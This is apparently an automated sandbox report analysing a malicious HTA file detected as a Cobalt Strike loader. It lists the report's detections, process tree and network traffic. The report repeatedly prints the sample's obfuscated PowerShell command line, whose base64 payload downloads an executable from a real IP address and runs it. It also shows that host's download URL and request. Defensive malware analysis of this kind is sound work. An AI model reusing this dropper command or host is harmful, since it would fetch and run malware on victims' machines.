Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sdf.hta

Overview

General Information

Sample name:sdf.hta
Analysis ID:1665127
MD5:73f9f8f8c9738f49854820688beae627
SHA1:467d5d213bd6f827aab35d5404eb01792bf19213
SHA256:8335aea59fc0f9ed4542db9221ee7e2c5ea6d7df36fe31ba7fe04bff878717a0
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike
Score:92
Range:0 - 100
Confidence:100%

Signatures

Detected Cobalt Strike Beacon
Multi AV Scanner detection for submitted file
Yara detected Powershell decode and execute
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 7400 cmdline: mshta.exe "C:\Users\user\Desktop\sdf.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 7500 cmdline: "C:\Windows\system32\cmd.exe" "/c PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7552 cmdline: PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 7688 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 7772 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA6B.tmp" "c:\Users\user\AppData\Local\Temp\l1pl2equ\CSC883B0A053CD34D78B131B177ADC31BC6.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
  • svchost.exe (PID: 7732 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Other

SourceRuleDescriptionAuthorStrings
amsi32_7552.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Suspicious MSHTA Child Process
    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2U
    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7552, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline", ProcessId: 7688, ProcessName: csc.exe
    Sigma detected: Dynamic CSharp Compile Artefact
    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7552, TargetFilename: C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))", CommandLine: PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgI
    Sigma detected: Windows Processes Suspicious Parent Directory
    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7732, ProcessName: svchost.exe

    Data Obfuscation

    barindex
    Sigma detected: Dot net compiler compiles file from suspicious location
    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7552, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline", ProcessId: 7688, ProcessName: csc.exe

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for submitted file
    Source: sdf.htaReversingLabs: Detection: 30%
    Joe Sandbox ML detected suspicious sample
    Source: Submited SampleNeural Call Log Analysis: 98.1%
    Source: Binary string: q7C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.pdb source: powershell.exe, 00000003.00000002.1268592235.00000000053C1000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb. source: powershell.exe, 00000003.00000002.1275318772.0000000007799000.00000004.00000020.00020000.00000000.sdmp
    Source: Joe Sandbox ViewIP Address: 172.245.191.88 172.245.191.88
    Source: global trafficHTTP traffic detected: GET /620/csrss.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.191.88Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04BE7A18 URLDownloadToFileW,3_2_04BE7A18
    Source: global trafficHTTP traffic detected: GET /620/csrss.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.191.88Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 14:44:12 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28Content-Length: 301Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 74 20 50 48 50 2f 38 2e 30 2e 32 38 20 53 65 72 76 65 72 20 61 74 20 31 37 32 2e 32 34 35 2e 31 39 31 2e 38 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Server at 172.245.191.88 Port 80</address></body></html>
    Source: powershell.exe, 00000003.00000002.1268592235.00000000053C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.191.88/620/csrss.
    Source: powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1277241225.00000000087E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.191.88/620/csrss.exe
